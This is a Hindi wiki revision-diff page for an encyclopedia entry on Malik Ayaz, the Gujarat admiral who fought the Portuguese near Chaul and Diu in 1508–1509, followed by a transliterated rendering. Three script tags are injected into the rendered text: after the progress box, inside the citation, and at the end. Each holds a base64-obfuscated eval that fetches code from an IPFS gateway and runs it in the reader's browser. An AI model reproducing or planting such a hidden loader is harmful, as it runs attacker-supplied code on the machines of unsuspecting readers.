Difference between revisions of "मलिक अयाज़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मलिक अयाज़''' गुजरात के सुल्तान महमूद बेंगड़ा (1459-15...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''मलिक अयाज़''' [[गुजरात]] के सुल्तान [[महमूद बेंगड़ा]] (1459-1511 ई.) के सामुद्रिक बेड़े का अधिनायक था।
+
'''मलिक अयाज़''' [[गुजरात]] के सुल्तान [[महमूद बेगड़ा]] (1459-1511 ई.) के सामुद्रिक बेड़े का अधिनायक था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=346|url=}}</ref>
*उसने 1508 ई. में मिस्री सामुद्रिक बेड़े के सहयोग से [[पुर्तग़ाली|पुर्तग़ालियों]] का सामना किया था।
+
 
 +
*मलिक अयाज़ ने 1508 ई. में मिस्री सामुद्रिक बेड़े के सहयोग से [[पुर्तग़ाली|पुर्तग़ालियों]] का सामना किया था।
 
*मिस्री बेड़े का अधिनायकत्व उस समय 'अमीर हुसैन' कर रहा था।
 
*मिस्री बेड़े का अधिनायकत्व उस समय 'अमीर हुसैन' कर रहा था।
 
*चौल के निकट मलिक अयाज़ ने सामुद्रिक लड़ाई में पुर्तग़ालियों को पराजित कर दिया।
 
*चौल के निकट मलिक अयाज़ ने सामुद्रिक लड़ाई में पुर्तग़ालियों को पराजित कर दिया।
*अगले ही साल ड्यू के निकट एक सामुद्रिक लड़ाई में पुर्तग़ालियों ने उसे पराजित कर दिया और उसका बेड़ा नष्ट कर दिया गया।
+
*अगले ही साल [[ड्यू]] के निकट एक सामुद्रिक लड़ाई में पुर्तग़ालियों ने उसे पराजित कर दिया और उसका बेड़ा नष्ट कर दिया गया।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=346|url=}}
 
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मध्य काल}}
 
{{मध्य काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
[[Category:मध्य काल]]
+
[[Category:मध्य काल]][[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:14, 14 September 2012

malik ayaz gujarat ke sultan mahamood beg da (1459-1511 ee.) ke samudrik be de ka adhinayak tha.[1]

  • malik ayaz ne 1508 ee. mean misri samudrik be de ke sahayog se purtagaliyoan ka samana kiya tha.
  • misri be de ka adhinayakatv us samay 'amir husain' kar raha tha.
  • chaul ke nikat malik ayaz ne samudrik l daee mean purtagaliyoan ko parajit kar diya.
  • agale hi sal dyoo ke nikat ek samudrik l daee mean purtagaliyoan ne use parajit kar diya aur usaka be da nasht kar diya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 346 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>